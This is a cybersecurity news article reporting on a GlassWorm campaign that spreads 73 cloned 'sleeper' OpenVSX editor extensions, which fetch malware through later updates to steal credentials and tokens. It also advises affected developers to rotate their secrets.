OpenVSX sleeper – A new GlassWorm wave uses 73 “sleeper” OpenVSX extensions that look harmless on install, then deliver malware after updates—prompting urgent secret rotation and cleanup.
A fresh GlassWorm campaign is making its way back into developer workflows, this time through the OpenVSX ecosystem.
This new GlassWorm push involves 73 “sleeper” extensions—uploads that appear benign at first, but switch on later when updates arrive. Researchers say six have already been activated to deliver malware, while the rest are likely dormant or at least suspicious as the investigation continues.
What makes these OpenVSX “sleeper” extensions dangerous
The core trick is timing. When these extensions are first installed, they don’t immediately behave like malware. Instead, they hold back the real payload and then reveal the attacker’s intent later—often through an update cycle that’s routine for developers.
Researchers at Misryoum’s cybersecurity coverage note that this pattern fits how earlier GlassWorm waves operated: the campaign is built to delay harm so traditional “spot it immediately” defenses struggle to catch it in time.
From invisible code to editor supply-chain attacks
GlassWorm is not a one-off incident. It’s an ongoing supply-chain style operation first observed in October, and it has already shown adaptability across multiple developer platforms.
Misryoum analysts describe how the campaign initially relied on stealth techniques such as invisible Unicode characters to conceal malicious logic. Over time, it expanded into other ecosystems—GitHub repositories, npm packages, and both the Visual Studio Code Marketplace and OpenVSX.
It has also been reported to target macOS users with trojanized crypto wallet clients. reinforcing that the end goals are broader than just “compromise a build step.” The throughline is theft: cryptocurrency wallet data. developer credentials. access tokens. SSH keys. and information from local development environments.
Why the “clone” approach matters
In the latest wave, Misryoum coverage highlights that the 73 suspicious extensions are designed to look like legitimate offerings.. Researchers say they are clones of existing or familiar listings. shaped to trick developers who glance mostly at the visuals—icons. names. and descriptions—rather than verifying publisher identity and extension identifiers.
One example described by Misryoum investigators involves the attacker using the same icon as a legitimate extension and aligning naming and description closely. Even where subtle differences exist, the important security takeaway is simple: the safest-looking extension can still be the wrong one.
In several cases, the differences are most noticeable in publisher details and the unique identifier—data that developers often ignore when they’re in a hurry to install something that “seems right.”
How the payload lands after an update
Misryoum reports that these extensions act less like full malware bundles and more like thin loaders. Instead of containing the harmful code directly, they fetch it later and then install or execute it through editor-compatible mechanisms.
Researchers identified multiple delivery styles across variants. Some extensions retrieve an additional VSIX package from GitHub during runtime, then install it using command-line tooling.
Other versions load platform-specific compiled modules (the .node files) that contain the core logic. From there, they can fetch further payloads and perform installation routines for supported editors.
A third category relies on obfuscated JavaScript that decodes at runtime to pull down and install malicious extensions. Misryoum notes that these variants sometimes include encrypted data or fallback URLs, adding resilience if one retrieval path fails.
Misryoum also emphasizes that while Misryoum’s reporting here doesn’t include new payload technical specifics, GlassWorm’s history makes the likely objectives clear: credential and token theft, plus opportunistic access to developer systems.
What developers should do now
If any of these extensions were installed—even before researchers flagged the campaign—Misryoum recommends treating the machine as potentially exposed.
Misryoum’s guidance is pragmatic: rotate all secrets and clean the environment. That means replacing tokens, passwords, API keys, SSH credentials, and any other sensitive values that could have been accessed or exfiltrated.
Because the attack is built around delayed execution, “I installed it but nothing happened” isn’t a reliable conclusion. The loader can remain quiet until an update triggers the harmful stage.
Why this strategy is spreading across ecosystems
The key reason these “sleeper” extensions are effective is that they blend into normal developer maintenance. Updates to editor extensions are routine, and most workflows assume that updates improve functionality—not that they act as a trigger for a second-stage compromise.
Misryoum sees this as part of a wider trend in supply-chain attacks: rather than trying to smuggle everything into a single artifact. attackers increasingly split the operation into stages.. A harmless-looking component buys time. reduces detection. and makes cleanup harder because investigators must connect the dots between initial install behavior and later-stage actions.
The fact that Misryoum’s reporting describes a mix of activated and dormant extensions suggests the attackers may be controlling rollout to manage visibility and reduce the chance of early shutdown.
The bigger risk: trust becomes the attack surface
GlassWorm’s return through OpenVSX is also a reminder of where modern risk concentrates: not in isolated systems, but in the tools developers rely on every day.
When an ecosystem’s extensions are easy to publish, search, and install, attackers don’t need to “break into” developer environments first. They can instead hijack trust—offering something that looks useful, then turning it into an entry point once it’s inside.
Misryoum will keep tracking the evolving list of affected extensions and how the campaign adapts as more updates appear.